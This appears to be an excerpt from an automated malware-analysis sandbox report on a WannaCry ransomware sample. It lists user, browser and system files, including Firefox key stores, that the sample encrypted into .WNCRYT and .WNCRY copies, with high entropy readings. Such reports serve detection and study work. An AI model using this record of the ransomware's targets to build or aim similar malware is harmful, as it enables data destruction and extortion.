                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRYT entropy: 7.99557312895Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRYT entropy: 7.99926686707Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Intel\CUIPromotions\Images\000000_INTEL.ODYSSEY_ADDITIONAL_GAMEPLAY_ASSET_CUI.2.3-600x300.png.WNCRYT entropy: 7.99923230102Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3075AAB0-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT entropy: 7.99956986741Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db.WNCRYT entropy: 7.99729961872Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db.WNCRYT entropy: 7.99748953277Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\eventpage_bin_prod.js.WNCRYT entropy: 7.99715485367Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRYT entropy: 7.99965231247Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT entropy: 7.99959558772Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRYT entropy: 7.99760714543Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRYT entropy: 7.99596155504Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRYT entropy: 7.99850121057Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb.WNCRYT entropy: 7.99991814511Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\jquery-2.1.1.min[1].js.WNCRYT entropy: 7.99794152673Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\kernel-1e468708[1].js.WNCRYT entropy: 7.99920736098Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT entropy: 7.99100127536Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx.WNCRYT entropy: 7.99540089165Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx.WNCRYT entropy: 7.99420579714Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx.WNCRYT entropy: 7.99994305953Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\WannaCry.cmd.WNCRYT entropy: 7.99996970245Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\WannaCry.cmd entropy: 7.99926954449Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRYT entropy: 7.99934672494Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRYT entropy: 7.99775079875Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db.WNCRYT entropy: 7.99921662155Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286130048509273.txt.WNCRYT entropy: 7.99839584406Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db.WNCRYT entropy: 7.99942255604Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286130348618804.txt.WNCRYT entropy: 7.99827750608Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRYT entropy: 7.99929003447Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRYT entropy: 7.99310922542Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRYT entropy: 7.99886987358Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRYT entropy: 7.99346982266Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002a.db.WNCRYT entropy: 7.99824426072Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT entropy: 7.99970885509Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Intel\GCC\IGCCSvc.db.WNCRYT entropy: 7.9901450839Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994707584058.txt.WNCRYT entropy: 7.99837723765Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Diagnosis\EventStore.db.WNCRYT entropy: 7.99823882225Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994802498611.txt.WNCRYT entropy: 7.99849234073Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db.WNCRYT entropy: 7.99985157337Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286129448402381.txt.WNCRYT entropy: 7.99847646983Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.WNCRYT entropy: 7.99967694781Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286164541279846.txt.WNCRYT entropy: 7.99857204938Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220120085256.txt.WNCRYT entropy: 7.99936251983Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220223140416.txt.WNCRYT entropy: 7.99923580578Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\User Account Pictures\user.bmp.WNCRYT entropy: 7.99971679466Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20230515092412.txt.WNCRYT entropy: 7.99954782409Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\s.wnry entropy: 7.998263053Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\t.wnry entropy: 7.99727613788Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRYT entropy: 7.99978659953Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRYT entropy: 7.9937386897Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRYT entropy: 7.99233215535Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRYT entropy: 7.99999171308Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.WNCRYT entropy: 7.99905807863Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsglobals.txt.WNCRYT entropy: 7.99944357781Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT entropy: 7.99792862115Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appssynonyms.txt.WNCRYT entropy: 7.99927921284Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT entropy: 7.99607318227Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20210930121453.txt.WNCRYT entropy: 7.99257596064Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT entropy: 7.99225861509Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20220223140416.txt.WNCRYT entropy: 7.993655518Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT entropy: 7.99842382893Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20230515092412.txt.WNCRYT entropy: 7.99764288179Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT entropy: 7.9952889667Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{25c88262-a7ab-45f7-85e7-7f8697edee0f}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99536048928Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT entropy: 7.99866536384Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5a1caf4e-992d-4eb4-b7f3-9cfc9fd49e6a}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99486634929Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT entropy: 7.99365012525Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ffa119a7-1647-4b3c-8c37-1046f5a858f2}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99529194446Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db.WNCRYT entropy: 7.99947041738Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsconversions.txt.WNCRYT entropy: 7.99987283047Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db.WNCRYT entropy: 7.99944224926Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsconversions.txt.WNCRYT entropy: 7.99969835961Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsglobals.txt.WNCRYT entropy: 7.99606755907Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.WNCRYT entropy: 7.99968101244Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingssynonyms.txt.WNCRYT entropy: 7.99829496617Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\en-us.16\stream.x64.en-us.db.WNCRYT entropy: 7.99964290826Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d33fc00a-caf3-45c1-9fbf-c4db6e8b3d32}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99925438629Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\x-none.16\stream.x64.x-none.db.WNCRYT entropy: 7.99993437071Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99915256324Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\IconCache.db.WNCRYT entropy: 7.99321607944Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_10[1].txt.WNCRYT entropy: 7.99910724454Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_11[1].txt.WNCRYT entropy: 7.99522164688Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_12[1].txt.WNCRYT entropy: 7.99923557165Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_13[1].txt.WNCRYT entropy: 7.99658852005Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_15[1].txt.WNCRYT entropy: 7.99865279881Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_16[1].txt.WNCRYT entropy: 7.99812943656Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_18[1].txt.WNCRYT entropy: 7.99879826603Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_19[1].txt.WNCRYT entropy: 7.99866035771Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_20[1].txt.WNCRYT entropy: 7.99729696186Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_21[1].txt.WNCRYT entropy: 7.99593774407Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_22[1].txt.WNCRYT entropy: 7.99891268405Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_24[1].txt.WNCRYT entropy: 7.99518345101Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_25[1].txt.WNCRYT entropy: 7.99579452207Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_26[1].txt.WNCRYT entropy: 7.99980132208Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_27[1].txt.WNCRYT entropy: 7.99798692127Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_28[1].txt.WNCRYT entropy: 7.99902849922Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_29[1].txt.WNCRYT entropy: 7.99009081156Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_2[1].txt.WNCRYT entropy: 7.99763460399Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\WannaCry.cmd.WNCRY (copy) entropy: 7.99996970245Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy) entropy: 7.99959558772Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRY (copy) entropy: 7.99934672494Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRY (copy) entropy: 7.99775079875Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRY (copy) entropy: 7.99929003447Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRY (copy) entropy: 7.99310922542Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRY (copy) entropy: 7.99886987358Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRY (copy) entropy: 7.99346982266Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy) entropy: 7.99970885509Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994707584058.txt.WNCRY (copy) entropy: 7.99837723765Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994802498611.txt.WNCRY (copy) entropy: 7.99849234073Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286129448402381.txt.WNCRY (copy) entropy: 7.99847646983Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286164541279846.txt.WNCRY (copy) entropy: 7.99857204938Jump to dropped file
